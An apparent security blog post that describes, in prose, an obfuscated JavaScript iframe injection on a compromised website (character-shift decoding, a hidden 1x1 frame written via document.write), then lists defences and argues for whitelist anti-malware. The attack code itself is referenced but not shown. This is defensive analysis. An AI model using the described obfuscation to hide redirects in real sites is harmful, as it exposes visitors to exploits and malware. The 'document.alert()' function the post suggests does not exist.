Analysis of an Obfuscated iFrame

Introduction

Obfuscated attacks against iFrames are wildly out of control in the IT world today. Legitimate enterprise websites and personal websites alike are unknowingly hosting these attacks. The attacks simply redirect users to a third party website hosting an exploit and more often than not pieces of malware. I have been given uncomfirmed reports that malware writers earn $1.50 for every system they deliver this malware to, which means that people are more than willing to deliver the attacks. In this research report we will look at a piece of obfuscated javascript in order to understand how attackers are hiding their activities on legitimate websites.

Below is a real iframe attack found on an exploited website.

Simple Analysis

It is rare that attack will be found in such readable form. In fact it is usually all put onto a single line, I simply broke it out into a more readable format. In some cases it is easy to find this code because it is by far the longest line in page. Regardless, below is the simple flow of this code works.

1. Initialize variables k1, k2, t1,t2, and h.

2. Deobfuscate k1 and k2

3. Write h to the user

Resulting deobfuscated code (*note that the frame is set to be virtually invisible 1×1 pixel)

Indepth Analysis

Variable Initalization

Let’s take a look at what’s happening here. First we have two hideous and large javascript string variables called “k1″ and “k2″ These variables contain obfuscated strings (I know tough to believe). Next we have two integer variables t1 and t2. Both variables are initialized to zero, these are dumb variables are meant to fuel the while loops later on in the code. Finally we have a string variable “h” which is initialized to NULL. h is basically the end variable that combines “behgczzazbzc” with the decoded k1 and k2 variables this provides the actual attack.

While Loops

The while Loops are relatively unimportant as they are merely deobfuscating the k1 and k2 variables and adding the deobfuscated information to the h string. In order to do this the attacker is using two predefined functions, the “String.FromCharCode()” function and the charCodeAt() attribute of the k1 string.

String.FromCharCode() is a function that returns the characters that correspond to the ISO-Latin-1 numerical position passed to the function. E.G. String.FromCharCode(65) = A

A reference sheet for ISO-Latin-1 characters and their numeric position can be viewed here.

In order to get the proper position to insert into the String.FromCharCode() the attack code first converts the current ISO-Latin-1 character into it’s corresponding position. This is done by using the string attribute charCodeAt() function. The while loops add a small amount of complication to this action by shifting the ISO-Latin-1 character position by -3 and -2.

Adding To the String

In the attack code (between the while loops), there is a simple addition to the string that adds the domain to the actual attack. There is no way to determine this is the domain until after the code is deobfuscated. The reason this is segmented in the code is because the attacker can quickly change the domain of the attack while preserving the overall attack extension.

Putting it All Together

The attack code finishes up by writing the document to the victim with the document.write() function. This is important to recognize because by the time the variable k1 reaches this function, it is deobfuscated. Therefore, an analyst can simply change this function to be none malicious in order to see what is actually obfuscated in the code. For example instead of document.write() one could use document.alert()

Detecting/Defending Against These Attacks

Anti-virus/Anti-malware

Some anti-virus and anti-malware solutions flag and stop these attacks from affecting end-users. Unfortunately however, research points to the fact that very few are actually capable of detecting these attacks.? I rolled this attack up into an HTML file and submitted it to virus total where 41 anti-virus/anti-malware scanners assessed the file. Of those 41 scanners, only three detected there was an issue.

Browser Protection Software:

• Trusteer Browser Protection Software
• Kace Browser Protection Software
• HP/Symantec/Mozilla Browser Sandboxing Software
• Various Virtual Browser Sandboxing Solutions

Content Filtering Technology

Content filtering technology could help in two ways, first it could detect the issue on the page to begin with and proactively categorize the page to preven tthe victim from accessing the attack code. Second, if the attack code is delivered to the victim the content filtering system could still prevent the victim from actually accessing the malicious website hosting the exploit and malware.

Example Content Filtering System Software:

• BlueCoat WebFilter
• WebSense WebFilter
• ScanSafe WebFilter/Malware Scanner
• Many many other

IPS Technology

Intrusion Prevention Systems can be used to block the exploit from getting to the victim. Unfortunately, in many cases the actual prevention is often based on the exploit and not the vulnerability. This means that the exploit can be altered to bypass the IPS fairly easily by altering the signature and/or behavior of the attack. Of course finely tuned and sophisticated IPS’ have less issues with this.

Example IPS:

• Sourcefire SNORT
• IBM Internet Security Systems Proventia
• McAfee Network Security Platform (formerly Intrushield IPS)
• TippingPoint Digital Vacine
• Many many others

When Did We Lose the Endpoint Security Fight?

First let me be specific when I mention “malware.”? When I’m talking about malware I am lumping together any type of malicious piece of software that can harm an end-user or system.? This means viruses, worms, trojans, keyloggers, rootkits, backdoors, etc. With that out of the way, I have to say that recent experiences in dealing with both security professionals and IT professionals has left me wondering, when did we concede defeat to malware? I have found myself explaining on multiple occasions to end users that “viruses happen.”? Which is as if to say, “Sorry nothing we can do about it, it’s just a side effect of using a computer.”

WHAT?!

When did we did we give up in the fight for protecting our networks from malware?? Furthermore, why, with advancing technology aren’t we better addressing the issues relating to malware? The search for the answers to these questions has sent me down a virtual memory lane of the incidents and virus outbreaks that have truly shaped the modern day IT security world. In the end though, I found that the answer was simple, we conceded defeat when we became unwilling to move off of broken and backwards endpoint security models.

Consider the History

From Cloner to Conficker (1982-2009) security has always been a step behind malicious attacks. The introduction of malware to the world at large came in the form of somewhat damaging and annoying but simple pieces of software that we termed viruses. The simplicity of these pieces of software yielded a relatively simple solution that we termed antivirus software. These early ancestors of modern day “Internet Security Suites” worked in a relatively simple fashion. Early antivirus would search files for a particular signature and if that signature matched a known bad signature, the antivirus would mitigate the issue.? Unfortunately, because Internet was nowhere near as large or as useful as it is today, most antivirus signature engines were not updated regularly. This means that as infected floppy disks were being passed from machine to machine, most systems were left vulnerable to the new or avant-garde attacks of the day.

However, because the number of viruses in the wild was relatively small (by today’s standards), antivirus companies were able to produce a reasonably high level of assurance that their software would protect their customer’s systems.? Furthermore, because antivirus software quite clearly did not enjoy the industry adoption that modern day relatives do, it made sense that the solutions were reactive in nature. Most organizations were looking to purchase antivirus software because they had experienced an incident or were experiencing an incident. Thus, it made sense that antivirus technology could be installed to alleviate a problem that already existed as opposed to try and prevent a problem from arising. In fact this model for solving known security issues worked so well for many organizations that antivirus software became a de facto security solution.

Then something interesting happenned, computers became interconnected through various networking technologies and viruses became self-propogating over various mechanisms.? Eventually we would call many of these self-propogating viruses worms because they were capable of traveling from computer to computer on their own (through wire tunnels). Early worms such as the “Morris Worm” wreaked havoc on networks all across the world. These worms exploited software vulnerabilities in ways that the IT community had never considered before. Instead of modernizing the endpoint antivirus solutions already adopted by many organizations, most sought network technologies to try and prevent worms from accessing propogation vectors. For example many integrated firewalls and gateway appliances that often scanned E-mails for viruses. However, most of the antivirus technologies available went unchanged, they were still using the exact same signature based scanning techniques in an attempt to address the changing threat landscape.

It was not until the massive flood of malware such as Code Red, Nimda, Klez, Blaster, Netsky, Sasser,Slammer and a myriad of others that we really started to see changes. More sophisticated antivirus solutions became anti-malware solutions or Internet Security Suites that integrated endpoint security technology such as host-based firewalls, host-based IPS, host-based spam filters, privacy protection, and even vulnerability management solutions. These technologies however were purposed to prevent malware from exploiting vulnerable vectors on an endpoint and wouldn’t prevent malware that was legitimately delivered to the system or was delivered over a vulnerability that the other technologies were not as of yet aware of.? Therefore antivirus engine models also began to evolve to be inclusive of technologies such as heuristic based malware detection, behavior detection, file analysis, and file emulation.

However, even with these innovations endpoint anti-malware alone does not offer a high-level of security assurance. Thus, most organizations have also integrated multiple network technologies in an attempt to try and complement the capabilities of endpoint ant-imalware. Technologies such as NAC which prevents users who may be infected from accessing the network segements of supposedly malware free machines, Intrusion Prevention Systems (IPS) which stop a multitude of network based attacks from exploiting endpoints, firewalls which also prevent a multitude of attacks, and Network Behavioral Analysis Detection Systems (NBADS) which detects covert channels used by malware.

While all of these technologies working together properly does offer a much higher-level of security assurance, unfortunately there are still a great deal of malware related issues. Unfortunately malware has evolved to take advantage of the logical cracks between the seperate security technologies used in these models.

How Does This Outline the Defeat?

The security community has been doomed to fail in the fight against malware from the very beginning. We built our models based on a last line of defense that is totally reactive. Anti-malware technology has made giant leaps in effectiveness with enhanced technologies such as heuristic or behavioral based detection. Unfortunately, that technology will always be reactive to the constantly evolving threat environment. Furthermore, the security community has been doomed to fail because instead of addressing that simple base issue, we have decided to attempt to tack-on new technology. This has done little more than grow network complexity and blur the lines of what technology is really responsible for preventing malware related issues. Of course don’t get me wrong I am a MAJOR advocate of network-based security technology such as content filters, IPS, firewalls, NBADS, and others. There are a multitude of reasons why these technologies are necessary. However, the underlying issue of malware still remains, we are doomed to concede defeat until we relieve ourselves of the blacklist endpoint anti-malware strategy.

Is There Light at the End of the Tunnel?

Quite possibly.? The continued proliferation and maturity of whitelist anti-malware models offers a great deal of hope. Whitelist anti-malware breaks the trend of endpoint security solutions predicated primarily on a reactive approach to security. Whitelist anti-malware simply focuses on what is allowed on a system as opposed to what is not. Of course this could cause a great deal of management overhead for organizations who have dynamic environments. However, as whitelist anti-malware has continued to mature most leaders in the space have made this a key focus area for the development that has gone into their products. And at this point, Whitelist anti-malware technology is a HOT topic in the market.

Many leaders are now capable of assisting security focused organizations in making the transition from ineffective blacklist models towards more effective, easy to manage, whitelist models. In fact, whitelist technology already has one of the best penetration rates in organizations focused on building the best security model possible from the ground up. Organizations such as those conforming to NERC/CIP standards have been especially keen on adopting endpoint whitelist technology. Besides the benefits of compliance and security, there are also major benefits in configuration change and control for adopters.

The rapid adoption of This has interesting future implications as the solidification of endpoints will allow organizations to focus on other areas outside of malware related incident response and endpoint security. As a result one would expect security postures to begin becoming more solid from the ground up. This could cause a far more sensible evolution in the methodolgy with which security models are built. Of course, at this point, one can only hope.